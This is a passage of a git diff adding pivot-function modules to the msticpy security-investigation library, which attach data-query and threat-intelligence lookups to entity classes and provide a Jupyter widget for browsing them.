+    def __getitem__(self, key: str):
+        """Allow property get using dictionary key syntax."""
+        if self.Url:
+            val = url_components(self.Url).get(key)
+            if val:
+                return val
+        return super().__getitem__(key)
+
+    def __getattr__(self, name: str):
+        """Return the value of the named property 'name'."""
+        if self.Url:
+            val = url_components(self.Url).get(name)
+            if val:
+                return val
+        return super().__getattr__(name)
+
+    _entity_schema: Dict[str, Any] = {
+        # Url (type System.String)
+        "Url": None,
+        "DetonationVerdict": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/pivot.py b/msticpy/datamodel/pivot.py
new file mode 100644
index 000000000..a4cdfc845
--- /dev/null
+++ b/msticpy/datamodel/pivot.py
@@ -0,0 +1,441 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot functions main module."""
+from datetime import datetime
+from typing import Any, Callable, Dict, Iterable, Optional, Type
+
+import pkg_resources
+from IPython import get_ipython
+
+from .._version import VERSION
+from ..common.timespan import TimeSpan
+from ..data import QueryProvider
+from ..nbtools.nbwidgets import QueryTime
+from ..sectools import TILookup
+
+# pylint: disable=unused-import
+from . import pivot_pd_accessor  # noqa: F401
+from .pivot_browser import PivotBrowser
+from .pivot_data_queries import add_data_queries_to_entities
+from .pivot_register import PivotRegistration
+from .pivot_register_reader import add_unbound_pivot_function, register_pivots
+from .pivot_ti_provider import add_ioc_queries_to_entities, register_ti_pivot_providers
+from . import entities
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_DEF_PIVOT_REG_FILE = "resources/mp_pivot_reg.yaml"
+
+
+# Import IPython magic if in an IPython environment
+if get_ipython():
+    from . import txt_df_magic  # noqa: F401
+
+
+class Pivot:
+    """Pivot environment loader."""
+
+    current: Optional["Pivot"] = None
+
+    def __init__(
+        self,
+        namespace: Dict[str, Any] = None,
+        providers: Iterable[Any] = None,
+        timespan: Optional[TimeSpan] = None,
+    ):
+        """
+        Instantiate a Pivot environment.
+
+        Parameters
+        ----------
+        namespace : Dict[str, Any], optional
+            To search for and use any current providers, specify
+            `namespace=globals()`, by default None
+        providers : Iterable[Any], optional
+            A list of query providers, TILookup or other providers to
+            use (these will override providers of the same type read
+            from `namespace`), by default None
+        timespan : Optional[TimeSpan], optional
+            The default timespan used by providers that require
+            start and end times. By default the time range is initialized
+            to be 24 hours prior to the load time.
+
+        """
+        self.__class__.current = self
+        self._query_time: QueryTime
+        if timespan is not None:
+            self.timespan = timespan
+        else:
+            self._query_time = self._get_default_query_time("day", 1)
+
+        # acquire current providers
+        self._providers: Dict[str, Any] = {}
+        self.reload_pivots(namespace=namespace, providers=providers)
+
+    def reload_pivots(
+        self,
+        namespace: Dict[str, Any] = None,
+        providers: Iterable[Any] = None,
+        clear_existing: bool = True,
+    ):
+        """
+        Load or reload Pivot functions from environment and/or providers list.
+
+        Parameters
+        ----------
+        namespace : Dict[str, Any], optional
+            To search for and use any current providers, specify
+            `namespace=globals()`, by default None
+        providers : Iterable[Any], optional
+            A list of query providers, TILookup or other providers to
+            use (these will override providers of the same type read
+            from `namespace`), by default None
+        clear_existing : bool
+            Reloads pivot functions without clearing existing pivot
+            assignments. Any pivot functions with conflicting names will
+            be overwritten by the reload operation.
+            The default is True.
+
+        """
+        if clear_existing:
+            self.remove_pivot_funcs(entity="all")
+
+        self._get_all_providers(namespace, providers)
+
+        # load and assign functions for data queries
+        data_provs = (
+            prov for prov in self._providers.values() if isinstance(prov, QueryProvider)
+        )
+        for prov in data_provs:
+            add_data_queries_to_entities(prov, self.get_timespan)
+
+        # load TI functions
+        add_ioc_queries_to_entities(self.get_provider("TILookup"), container="ti")
+
+        # Add pivots from Pivot-capable TI providers
+        register_ti_pivot_providers(self.get_provider("TILookup"), self)
+
+        # Add pivots from config registry
+        register_pivots(
+            file_path=self._get_def_pivot_reg(), container="util", namespace=namespace
+        )
+
+    def _get_all_providers(
+        self,
+        namespace: Dict[str, Any] = None,
+        providers: Iterable[Any] = None,
+    ):
+        self._get_query_providers(namespace=namespace, providers=providers)
+        self._providers["TILookup"] = (
+            self._get_provider_by_type(
+                namespace=namespace, providers=providers, provider_type=TILookup
+            )
+            or TILookup()
+        )
+
+    def _get_query_providers(
+        self,
+        namespace: Dict[str, Any] = None,
+        providers: Iterable[Any] = None,
+    ):
+        """Update the current list of loaded providers."""
+        if namespace:
+            # return just one provider for each data env.
+            # Use the last one in the namespace
+            self._providers.update(
+                {
+                    prov.environment: prov
+                    for prov in namespace.values()
+                    if isinstance(prov, QueryProvider)
+                }
+            )
+        if providers:
+            self._providers.update(
+                {
+                    prov.environment: prov
+                    for prov in providers
+                    if isinstance(prov, QueryProvider)
+                }
+            )
+
+    def add_query_provider(self, prov: QueryProvider):
+        """
+        Add pivot functions from provider.
+
+        Parameters
+        ----------
+        prov : QueryProvider
+            Query provider.
+
+        """
+        add_data_queries_to_entities(prov, self.get_timespan)
+
+    @staticmethod
+    def _get_provider_by_type(
+        provider_type: Type,
+        namespace: Dict[str, Any] = None,
+        providers: Iterable[Any] = None,
+    ) -> Any:
+        if providers:
+            ti_provs = [prov for prov in providers if isinstance(prov, provider_type)]
+            if ti_provs:
+                return ti_provs[0]
+        if namespace:
+            ns_providers = [
+                prov for prov in namespace.values() if isinstance(prov, provider_type)
+            ]
+            if ns_providers:
+                return ns_providers[-1]
+        return None
+
+    @staticmethod
+    def _get_def_pivot_reg():
+        return pkg_resources.resource_filename("msticpy", _DEF_PIVOT_REG_FILE)
+
+    @property
+    def providers(self) -> Dict[str, Any]:
+        """
+        Return the current set of loaded providers.
+
+        Returns
+        -------
+        Dict[str, Any]
+            provider_name, provider_instance
+
+        """
+        return self._providers
+
+    def get_provider(self, name: str) -> Any:
+        """
+        Get a provider by type name.
+
+        Parameters
+        ----------
+        name : str
+            The name of the provider type.
+
+        Returns
+        -------
+        Any
+            An instance of the provider or None
+            if the Pivot environment does not have one.
+
+        """
+        return self._providers.get(name)
+
+    def edit_query_time(self, timespan: Optional[TimeSpan] = None):
+        """
+        Display a QueryTime widget to get the timespan.
+
+        Parameters
+        ----------
+        timespan : Optional[TimeSpan], optional
+            Pre-populate the timespan shown by the QueryTime editor,
+            by default None
+
+        """
+        self._query_time = QueryTime(
+            timespan=timespan or self.timespan,
+            label="Set time range for pivot functions.",
+        )
+        self._query_time.display()
+
+    @staticmethod
+    def _get_default_query_time(units: str = "day", before: int = 1):
+        return QueryTime(
+            origin_time=datetime.utcnow(),
+            before=before,
+            after=0,
+            label="Set time range for pivot functions.",
+            units=units,
+        )
+
+    @property
+    def start(self):
+        """Return current start time for queries."""
+        return self._query_time.start
+
+    @property
+    def end(self):
+        """Return current end time for queries."""
+        return self._query_time.end
+
+    @property
+    def timespan(self) -> TimeSpan:
+        """
+        Return the current timespan.
+
+        Returns
+        -------
+        TimeSpan
+            The current timespan
+
+        """
+        return TimeSpan(start=self.start, end=self.end)
+
+    @timespan.setter
+    def timespan(self, value: Any):
+        """
+        Set the pivot timespan.
+
+        Parameters
+        ----------
+        value : Optional[Any], optional
+            Timespan object or something convertible to
+            a TimeSpan, by default None
+
+        """
+        if isinstance(value, TimeSpan):
+            timespan = value
+        elif value is not None:
+            timespan = TimeSpan(value)
+        self._query_time = QueryTime(
+            timespan=timespan,
+            label="Set time range for pivot functions.",
+        )
+
+    def set_timespan(self, value: Optional[Any] = None, **kwargs):
+        """
+        Set the pivot timespan.
+
+        Parameters
+        ----------
+        value : Optional[Any], optional
+            Timespan object or something convertible to
+            a TimeSpan, by default None
+
+        Other Parameters
+        ----------------
+        kwargs
+            Key/value arguments passed to Timespan constructor.
+
+        """
+        if isinstance(value, TimeSpan):
+            timespan = value
+        elif value is not None:
+            timespan = TimeSpan(value)
+        else:
+            timespan = TimeSpan(**kwargs)
+        self.timespan = timespan
+
+    def get_timespan(self) -> TimeSpan:
+        """Return the timespan as a TimeSpan object."""
+        return TimeSpan(start=self.start, end=self.end)
+
+    @staticmethod
+    def register_pivot_providers(
+        pivot_reg_path: str,
+        namespace: Dict[str, Any] = None,
+        def_container: str = "custom",
+        force_container: bool = False,
+    ):
+        """
+        Register pivot functions from configuration file.
+
+        Parameters
+        ----------
+        pivot_reg_path : str
+            Path to config yaml file
+        namespace : Dict[str, Any], optional
+            Namespace to search for existing instances of classes, by default None
+        def_container : str, optional
+            Container name to use for entity pivot functions, by default "other"
+        force_container : bool, optional
+            Force `container` value to be used even if entity definitions have
+            specific setting for a container name, by default False
+
+        Raises
+        ------
+        ValueError
+            An entity specified in the config file is not recognized.
+
+        """
+        register_pivots(
+            pivot_reg_path,
+            def_container=def_container,
+            force_container=force_container,
+            namespace=namespace,
+        )
+
+    @staticmethod
+    def add_pivot_function(
+        func: Callable[[Any], Any],
+        pivot_reg: "PivotRegistration" = None,
+        container: Optional[str] = None,
+        **kwargs,
+    ):
+        """
+        Add a pivot function to entities.
+
+        Parameters
+        ----------
+        func : Callable[[Any], Any]
+            The function to add
+        pivot_reg : PivotRegistration, optional
+            Pivot registration object, by default None
+        container : str, optional
+            The name of the container into which the function
+            should be added, by default "other"
+
+        Other Parameters
+        ----------------
+        kwargs
+            If `pivot_reg` is not supplied you can specify required
+            pivot registration parameters via keyword arguments. You must
+            specify `input_type` (str) and `entity_map` (dict of entity_name,
+            entity_attribute pairs)
+
+        See Also
+        --------
+        PivotRegistration
+
+        """
+        container = container or (
+            pivot_reg.entity_container_name
+            if pivot_reg and pivot_reg.entity_container_name
+            else "other"
+        )
+        add_unbound_pivot_function(
+            func=func, pivot_reg=pivot_reg, container=container, **kwargs
+        )
+
+    @staticmethod
+    def remove_pivot_funcs(entity: str):
+        """
+        Remove pivot functions from one or all entities.
+
+        Parameters
+        ----------
+        entity : str
+            entity class name or "all" to remove all pivot functions.
+
+        Raises
+        ------
+        ValueError
+            If entity is not a recognized entity class.
+
+        """
+        all_entities = dir(entities)
+        if entity != "all":
+            if entity not in all_entities:
+                raise ValueError(f"Entity name '{entity}' not found.")
+            entity_names = [entity]
+        else:
+            entity_names = all_entities
+        for entity_name in entity_names:
+            entity_cls = getattr(entities, entity_name)
+            for attr in dir(entity_cls):
+                attr_obj = getattr(entity_cls, attr)
+                if type(attr_obj).__name__ == "QueryContainer":
+                    delattr(entity_cls, attr)
+                if callable(attr_obj) and hasattr(attr_obj, "pivot_properties"):
+                    delattr(entity_cls, attr)
+
+    @staticmethod
+    def browse():
+        """Return PivotBrowser."""
+        return PivotBrowser()
diff --git a/msticpy/datamodel/pivot_browser.py b/msticpy/datamodel/pivot_browser.py
new file mode 100644
index 000000000..a3d6dc939
--- /dev/null
+++ b/msticpy/datamodel/pivot_browser.py
@@ -0,0 +1,252 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot browser widget."""
+from typing import Dict, List
+
+from IPython import get_ipython
+from IPython.display import display
+import ipywidgets as widgets
+from . import entities
+
+from .._version import VERSION
+
+try:
+    import pyperclip
+
+    _ENABLE_CLIP = True
+except ImportError:
+    _ENABLE_CLIP = False
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def _get_entities_with_pivots():
+    piv_entities = {}
+    for entity_name in dir(entities):
+        entity = getattr(entities, entity_name)
+        if not isinstance(entity, type) or not issubclass(entity, entities.Entity):
+            continue
+        piv_list = sorted(entity.get_pivot_list())
+        if piv_list:
+            piv_entities[entity_name] = entity, piv_list
+    return piv_entities
+
+
+def _box_layout(width="95%"):
+    return widgets.Layout(
+        **{
+            "width": width,
+            "border": "solid gray 1px",
+            "margin": "1pt",
+            "padding": "5pt",
+        }
+    )
+
+
+_GENERIC_HELP = """
+<p><b>Call with string/simple value:</b></p>
+<p><i>Entity.categ.func</i>(<i>arg</i>)</p>
+<p><code>IpAddress.util.whois("192.168.1.1")</code></p>
+
+<p><b>Call with list:</b>
+<p><i>Entity.categ.func</i>(<i>list</i>)</p>
+<p><code>IpAddress.util.ip_type(ip_list1)</code></p>
+
+<p><b>Call with entity:</b></p>
+<p><i>Entity.categ.func</i>(<i>entity</i>)</p>
+<p><code>IpAddress.util.ip_type(ip_entity)</code></p>
+
+<p><b>Call with dataframe:</b></p>
+<p><i>Entity.categ.func</i>(data=<i>df</i>, column=<i>col_name</i>)</p>
+<p><code>IpAddress.util.ip_type(data=ip_df, column="ip")</code></p>
+<hr>
+<p><b>Note:</b> when calling data queries, instead of using generic parameter
+names like 'column' or value, you must use the parameter name
+expected by the function. E.g. '..func(host_name="myhost")',
+func(data=my_df, account_name="ian")', etc.</p>
+<p>See the function-specific help for more details</p>
+
+"""
+
+
+class PivotBrowser:
+    """Pivot enitity browser class."""
+
+    def __init__(self):
+        """Create an instance of the Pivot browser."""
+        self._text: Dict[str, widgets.Widget] = {}
+        self._select: Dict[str, widgets.Widget] = {}
+        self._layout: Dict[str, widgets.Widget] = {}
+        self._html: Dict[str, widgets.Widget] = {}
+        self._btn: Dict[str, widgets.Widget] = {}
+
+        self.piv_entities: Dict[str, List[str]] = _get_entities_with_pivots()
+
+        self._create_select_controls()
+        self._create_help_controls()
+        self._create_search_controls()
+
+        deflt_funcs = next(iter(self.piv_entities.values()))[1][0]
+        self._select_function({"new": deflt_funcs})
+        self._search_func(change={"new": ""})
+        self.layout = widgets.VBox(
+            [
+                self._layout["entity_funcs"],
+                self._layout["search_box"],
+                self._layout["disp_btn_hbox"],
+                self._layout["func_help_accd"],
+            ]
+        )
+
+    def _create_select_controls(self):
+        """Instantiate and set up select widgets."""
+        self._select["pivot_funcs"] = widgets.Select(
+            description="pivot function",
+            options=next(iter(self.piv_entities.values()))[1],
+            layout=widgets.Layout(height="300px", width="95%"),
+        )
+
+        self._select["pivot_funcs"].observe(self._select_function, names="value")
+
+        self._select["entities"] = widgets.Select(
+            description="entity",
+            options=list(self.piv_entities.keys()),
+            layout=widgets.Layout(height="300px", width="70%"),
+        )
+
+    def _create_help_controls(self):
+        """Instantiate and set up help widgets."""
+        self._html["gen_help"] = widgets.HTML(_GENERIC_HELP)
+        self._html["func_help"] = widgets.HTML("")
+        self._html["search_res"] = widgets.HTML("")
+        self._layout["func_help_accd"] = widgets.Accordion(
+            children=[
+                self._html["gen_help"],
+                self._html["func_help"],
+                self._html["search_res"],
+            ],
+            layout=_box_layout("95%"),
+        )
+        self._layout["func_help_accd"].set_title(0, "Generic Pivot function help")
+        self._layout["func_help_accd"].set_title(1, "Function-specific help")
+        self._layout["func_help_accd"].set_title(2, "Search results (0)")
+        self._layout["func_help_accd"].selected_index = None
+
+        self._select["entities"].observe(self._display_pivots, names="value")
+
+        self._layout["entity_box"] = widgets.VBox(
+            [widgets.HTML("<b>Entities</b>"), self._select["entities"]],
+            layout=_box_layout("40%"),
+        )
+        self._layout["funcs_box"] = widgets.VBox(
+            [
+                widgets.HTML("<b>Selected entity pivot Functions</b>"),
+                self._select["pivot_funcs"],
+            ],
+            layout=_box_layout("55%"),
+        )
+        self._layout["entity_funcs"] = widgets.HBox(
+            [self._layout["entity_box"], self._layout["funcs_box"]],
+            layout=widgets.Layout(width="100%"),
+        )
+
+    def _create_search_controls(self):
+        """Instantiate and set up search widgets."""
+        self._text["search_txt"] = widgets.Text(
+            description="Search:",
+            style={"description_width": "initial"},
+            layout=widgets.Layout(width="95%"),
+            continuous_update=False,
+        )
+        self._layout["search_box"] = widgets.HBox(
+            [self._text["search_txt"]], layout=_box_layout("95%")
+        )
+        self._text["search_txt"].observe(self._search_func, names="value")
+        self._html["cur_func_title"] = widgets.HTML(
+            description="Current function:", style={"description_width": "initial"}
+        )
+        self._btn["copy"] = widgets.Button(description="Copy to clipboard")
+        self._btn["copy"].on_click(self._copy_to_clip)
+        self._btn["copy"].enabled = _ENABLE_CLIP
+        self._layout["disp_btn_hbox"] = widgets.HBox(
+            [self._html["cur_func_title"], self._btn["copy"]], layout=_box_layout("95%")
+        )
+
+    def display(self):
+        """Display the widget."""
+        display(self.layout)
+
+    def _ipython_display_(self):
+        """Display in IPython."""
+        self.display()
+
+    def _display_pivots(self, change):
+        entity = change.get("new")
+        self._select["pivot_funcs"].options = self.piv_entities.get(entity)[1]
+
+    def _select_function(self, change):
+        func_name = change.get("new")
+        entity_name = self._select["entities"].value
+        entity = self.piv_entities[entity_name][0]
+        func_name_path = func_name.split(".")
+        obj = entity
+        for path in func_name_path:
+            obj = getattr(obj, path)
+        doc_str = [
+            "<i>Note: use generic help and parameters listed "
+            + "there for most common use of pivot functions</i>",
+            "",
+            f"<b>{entity_name}.{func_name}</b>",
+            obj.__doc__.replace("\n", "<br>").replace(" ", "&nbsp;"),
+        ]
+
+        self._html["func_help"].value = "<br>".join(doc_str)
+        self._html["cur_func_title"].value = f"<code>{self._get_current_func()}</code>"
+
+    def _get_current_func(self):
+        func_name = self._select["pivot_funcs"].value
+        entity_name = self._select["entities"].value
+        return f"entities.{entity_name}.{func_name}()"
+
+    def _add_cur_func_to_cell(self, btn):
+        del btn
+        get_ipython().set_next_input(self._get_current_func())
+
+    def _copy_to_clip(self, btn):
+        del btn
+        if _ENABLE_CLIP:
+            pyperclip.copy(self._get_current_func())
+
+    def _search_func(self, change):
+        search_txt = change.get("new")
+        search_results, hits = self._search_funcs(search_txt)
+        self._layout["func_help_accd"].set_title(2, f"Search results ({hits})")
+        self._html["search_res"].value = search_results
+
+    def _search_funcs(self, search_txt):
+        f_entities = {
+            ent for ent in self.piv_entities if search_txt.casefold() in ent.casefold()
+        }
+        matching_funcs = [
+            (ent, func)
+            for ent, ent_piv in self.piv_entities.items()
+            for func in ent_piv[1]
+            if search_txt.casefold() in func.casefold()
+        ]
+
+        hit_count = len(f_entities)
+        ent_with_funcs = {ent[0] for ent in matching_funcs}
+        f_entities.update(ent_with_funcs)
+
+        ent_func_list = []
+        for entity in f_entities:
+            ent_func_list.append(f"<b>{entity}</b>")
+            if entity in ent_with_funcs:
+                ent_funcs = [item[1] for item in matching_funcs if item[0] == entity]
+                ent_func_list.extend(ent_funcs)
+                hit_count += len(ent_funcs)
+        return "<br>".join(ent_func_list), hit_count
diff --git a/msticpy/datamodel/pivot_data_queries.py b/msticpy/datamodel/pivot_data_queries.py
new file mode 100644
index 000000000..8b359dea3
--- /dev/null
+++ b/msticpy/datamodel/pivot_data_queries.py
@@ -0,0 +1,677 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot query functions class."""
+import itertools
+import warnings
+from collections import defaultdict, namedtuple, abc
+from functools import wraps
+from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Type
+
+import pandas as pd
+
+from .pivot_register import join_result, get_join_params
+from ..common.timespan import TimeSpan
+from .._version import VERSION
+from ..data.data_providers import QueryProvider
+from ..data.query_container import QueryContainer
+from ..data.query_source import QuerySource
+from . import entities
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+ParamAttrs = namedtuple("ParamAttrs", "type, query, family, required")
+QueryParams = namedtuple(
+    "QueryParams", "all, required, full_required, param_attrs, table"
+)
+PivQuerySettings = namedtuple(
+    "PivQuerySettings", "short_name, direct_func_entities, assigned_entities"
+)
+
+_DEF_IGNORE_PARAM = {"start", "end"}
+
+_TABLE_SHORTNAMES = {
+    "SecurityEvent": "wevt",
+    "Syslog": "lxsys",
+    "SecurityAlert": "",
+    "SigninLogs": "aad",
+    "AzureActivity": "az",
+    "AzureNetworkAnalytics_CL": "aznet",
+    "OfficeActivity": "o365",
+    "ThreatIntelligenceIndicator": "azti",
+    "Heartbeat": "hb",
+    "AuditLog_CL": "lxaud",
+    "HuntingBookmark": "azsent",
+    "StorageFileLogs": "az",
+    "DnsEvents": "dns",
+}
+
+
+class PivotQueryFunctions:
+    """Class to retrieve the queries and params from a provider."""
+
+    current = None
+
+    def __init__(self, query_provider: QueryProvider, ignore_reqd: List[str] = None):
+        """
+        Instantiate PivotQueryFunctions class.
+
+        Parameters
+        ----------
+        query_provider : [type]
+            The query provider to load
+        ignore_reqd : List[str], optional
+            List of parameters to ignore when building the required
+            parameters list (e.g. ['start', 'end']), by default None
+
+        """
+        self.__class__.current = self
+        self._provider = query_provider
+        self.param_usage: Dict[str, List[ParamAttrs]] = defaultdict(list)
+        self.query_params: Dict[str, QueryParams] = {}
+
+        # specify any parameters to exclude from our list
+        ignore_params = set(ignore_reqd) if ignore_reqd else _DEF_IGNORE_PARAM
+
+        # get the query dict for each data family
+        for family, fam_dict in self._provider.query_store.data_families.items():
+            # for each query
+            for src_name, q_source in fam_dict.items():
+                # get the set of required params
+                reqd_params = set(q_source.required_params.keys()) - ignore_params
+                # add them to the param_usage attrib
+                for param, p_attrs in q_source.params.items():
+                    self.param_usage[param].append(
+                        ParamAttrs(
+                            p_attrs["type"],
+                            src_name,
+                            family,
+                            bool(param in reqd_params),
+                        )
+                    )
+                # add an entry to the query dictionary containing full
+                # details of the function/query parameters
+                self.query_params[f"{family}.{src_name}"] = QueryParams(
+                    all=list(q_source.params),
+                    required=list((set(q_source.required_params) - ignore_params)),
+                    full_required=list(q_source.required_params),
+                    param_attrs={
+                        param: ParamAttrs(
+                            p_attrs["type"],
+                            src_name,
+                            family,
+                            bool(param in reqd_params),
+                        )
+                        for param, p_attrs in q_source.params.items()
+                    },
+                    table=q_source.params.get("table", {}),
+                )
+
+    def get_query_settings(self, family: str, query: str) -> QuerySource:
+        """
+        Get the QuerySource for the named `family` and `query`.
+
+        Parameters
+        ----------
+        family : str
+            Data family name
+        query : str
+            Query name
+
+        Returns
+        -------
+        QuerySource
+            Query settings object
+
+        Raises
+        ------
+        KeyError
+            If `family`.`query` could not be found.
+
+        """
+        q_source = self._provider.query_store.data_families.get(family, {}).get(query)
+        if not q_source:
+            raise KeyError(f"No query found for {family}.{query}")
+        return q_source
+
+    def get_query_pivot_settings(self, family: str, query: str) -> PivQuerySettings:
+        """
+        Get Pivot settings metadata for a query.
+
+        Parameters
+        ----------
+        family : str
+            Data family
+        query : str
+            Query name
+
+        Returns
+        -------
+        PivQuerySettings
+            Named tuple:
+
+            - short_name - short name for the query
+            - direct_func_entities - the entities to add a top level function to
+            - assigned_entities - entities to assign the query to (if parameter
+              mapping is not applicable).
+
+        """
+        qs_pivot = self.get_query_settings(family, query).metadata.get("pivot", {})
+        return PivQuerySettings(
+            short_name=qs_pivot.get("short_name"),
+            direct_func_entities=qs_pivot.get("direct_func_entities"),
+            assigned_entities=qs_pivot.get("assigned_entities"),
+        )
+
+    def get_queries_and_types_for_param(
+        self, param: str
+    ) -> Iterable[Tuple[str, str, str, Callable[[Any], Any]]]:
+        """
+        Get queries and parameter data types for `param`.
+
+        Parameters
+        ----------
+        param : str
+            The parameter name.
+
+        Returns
+        -------
+        Iterable[Tuple[str, str, Callable[[Any], Any]]]
+            Iterable of tuples listing:
+            query_name, param_type, query_func
+
+        """
+        param_usage = self.param_usage.get(param)
+        if param_usage is None:
+            return []
+        get_param_props = (
+            (param.query, param.family, param.type, f"{param.family}.{param.query}")
+            for param in param_usage
+        )
+        return [
+            (q_name, q_family, p_type, getattr(self._provider, q_func), q_func)  # type: ignore
+            for q_name, q_family, p_type, q_func in get_param_props
+        ]
+
+    def get_queries_for_param(
+        self, param: str
+    ) -> Iterable[Tuple[str, str, Callable[[Any], Any]]]:
+        """
+        Get the list of queries for a parameter.
+
+        Parameters
+        ----------
+        param : str
+            Parameter name
+
+        Returns
+        -------
+        Iterable[Tuple[str, str, Callable[[Any], Any]]]
+            Iterable of tuples listing:
+            query_name, query_func
+
+        """
+        param_usage = self.param_usage.get(param)
+        if not param_usage:
+            return []
+        return [
+            (query_name, query_family, getattr(self._provider, query_func_name))
+            for query_name, query_family, query_func_name in (
+                (param.query, param.family, f"{param.family}.{param.query}")
+                for param in self.param_usage.get(param)  # type:ignore
+            )
+        ]
+
+    def get_params(self, query_func_name: str) -> Optional[QueryParams]:
+        """
+        Get the parameters for a query function.
+
+        Parameters
+        ----------
+        query_func_name : str
+            Query name - the name must be fully-qualified
+            (e.g. 'WindowsSecurity.list_processes')
+
+        Returns
+        -------
+        QueryParams
+            QueryParams named tuple
+            (all, required, full_required, param_attrs, table)
+
+        """
+        return self.query_params.get(query_func_name)
+
+    def get_param_attrs(self, param_name: str) -> List[ParamAttrs]:
+        """
+        Get the attributes for a parameter name.
+
+        Parameters
+        ----------
+        param_name : str
+            Parameter name
+
+        Returns
+        -------
+        List[ParamAttrs]
+            List of ParamAttrs named tuples:
+            (type, query, family, required)
+
+        Notes
+        -----
+        Since parameters may be defined for multiple queries, the
+        set of parameter attributes will be returned for each query.
+
+        """
+        return self.param_usage.get(param_name, [])
+
+
+# Map of query parameter names to entities and the entity attrib
+# corresponding to the query parameter value
+PARAM_ENTITY_MAP: Dict[str, List[Tuple[Type[entities.Entity], str]]] = {
+    "account_name": [(entities.Account, "Name")],
+    "host_name": [(entities.Host, "fqdn")],
+    "process_name": [(entities.Process, "ProcessFilePath")],
+    "ip_address": [(entities.IpAddress, "Address")],
+    "domain": [(entities.Dns, "DomainName")],
+    "logon_session_id": [
+        (entities.Process, "LogonSession"),
+        (entities.HostLogonSession, "SessionId"),
+        (entities.Account, "LogonId"),
+    ],
+    "proc_op": [],
+    "process_id": [(entities.Process, "ProcessId")],
+    "commandline": [(entities.Process, "CommandLine")],
+    "url": [(entities.Url, "Url")],
+    "file_hash": [(entities.File, "file_hash")],
+    "resource_id": [(entities.AzureResource, "ResourceId")],
+}
+
+# aliases for parameters
+PARAM_ENTITY_MAP["ip_address_list"] = PARAM_ENTITY_MAP["ip_address"]
+PARAM_ENTITY_MAP["source_ip_list"] = PARAM_ENTITY_MAP["ip_address"]
+PARAM_ENTITY_MAP["user"] = PARAM_ENTITY_MAP["account_name"]
+PARAM_ENTITY_MAP["file_hash_list"] = PARAM_ENTITY_MAP["file_hash"]
+PARAM_ENTITY_MAP["domain_list"] = PARAM_ENTITY_MAP["domain"]
+PARAM_ENTITY_MAP["url_list"] = PARAM_ENTITY_MAP["url"]
+
+
+def add_data_queries_to_entities(
+    provider: QueryProvider, get_timespan: Callable[[], TimeSpan]
+):
+    """
+    Add data queries from `provider` to entities.
+
+    Parameters
+    ----------
+    provider : QueryProvider
+        Query provider
+    get_timespan : Callable[[], TimeSpan]
+        Callback to get time span
+
+    """
+    q_funcs = PivotQueryFunctions(provider)
+
+    add_queries_to_entities(
+        prov_qry_funcs=q_funcs,
+        container=provider.environment,
+        get_timespan=get_timespan,
+    )
+
+
+# pylint: disable=too-many-locals
+
+
+def add_queries_to_entities(
+    prov_qry_funcs: PivotQueryFunctions,
+    container: str,
+    get_timespan: Callable[[], TimeSpan],
+):
+    """
+    Add data queries to entities.
+
+    Parameters
+    ----------
+    prov_qry_funcs : PivotQueryFunctions
+        Collection of wrapped query functions
+    container : str
+        The name of the container to add query functions to
+    get_timespan : Callable[[], TimeSpan]
+        Function to get the current timespan.
+
+    """
+    # For each parameter in the parameter map
+    for param_name, entity_list in PARAM_ENTITY_MAP.items():
+
+        param_funcs = list(prov_qry_funcs.get_queries_for_param(param_name))
+        if not (entity_list and param_funcs):
+            continue
+        entity_funcs = itertools.product(entity_list, param_funcs)
+        # For each entity/query combo that uses this parameter
+        for (entity_cls, _), (name, family, func) in entity_funcs:
+            func_params = prov_qry_funcs.get_params(f"{family}.{name}")
+            if not func_params or len(func_params.all) == 0:
+                # ignore any functions without parameters
+                continue
+
+            # If multiple params - get the ones that are available in the same entity
+            # We could in the future get parameters for connected (graph) entities.
+            param_entities = {
+                param: (ent, attr)
+                for param, ent_list in PARAM_ENTITY_MAP.items()
+                for ent, attr in ent_list
+                if param in func_params.all and ent == entity_cls
+            }
+            # Build the map of param names to entity attributes
+            attr_map = {
+                param: ent_attr for param, (_, ent_attr) in param_entities.items()
+            }
+            # Wrap the function
+            cls_func = _create_pivot_func(
+                func, func_params.param_attrs, attr_map, get_timespan
+            )
+            # add a properties dict to the function
+            setattr(
+                cls_func,
+                "pivot_properties",
+                _create_piv_properties(name, param_entities, container),
+            )
+            q_piv_settings = prov_qry_funcs.get_query_pivot_settings(family, name)
+            func_name = _format_func_name(name, func_params, q_piv_settings)
+
+            # Add the wrapped function to the entity container
+            query_container = getattr(entity_cls, container, None)
+            if not query_container:
+                query_container = QueryContainer()
+                setattr(entity_cls, container, query_container)
+            setattr(query_container, func_name, cls_func)
+
+            # Also set this as a direct entity method if this entity is listed
+            # in the query pivot "direct_func_entities" list
+            if (
+                q_piv_settings.direct_func_entities
+                and entity_cls.__name__ in q_piv_settings.direct_func_entities
+            ):
+                dir_func_name = f"qry_{func_name}"
+                setattr(entity_cls, dir_func_name, cls_func)
+
+
+# pylint: enable=too-many-locals
+
+
+def _format_func_name(name, func_params, q_piv_settings):
+    # To help disambiguation we prefix the function name with
+    # the table name (or short version)
+    table_name = func_params.table.get("default", "")
+    t_prefix = _TABLE_SHORTNAMES.get(table_name, table_name)
+    if t_prefix and not t_prefix.endswith("_"):
+        t_prefix = f"{t_prefix}_"
+    # if query func has a short name, use that
+    q_name = q_piv_settings.short_name or name
+    return f"{t_prefix}{q_name}" if table_name else q_name
+
+
+def _create_piv_properties(name, param_entities, container):
+    return {
+        "src_func_name": name,
+        "src_class": "QueryProvider",
+        "src_module": "msticpy.data.dataproviders",
+        "entity_map": dict(param_entities.values()),
+        "entity_container_name": container,
+    }
+
+
+def _create_pivot_func(
+    func: Callable[[Any], pd.DataFrame],
+    func_params: Dict[str, ParamAttrs],
+    param_attrib_map: Dict[str, str],
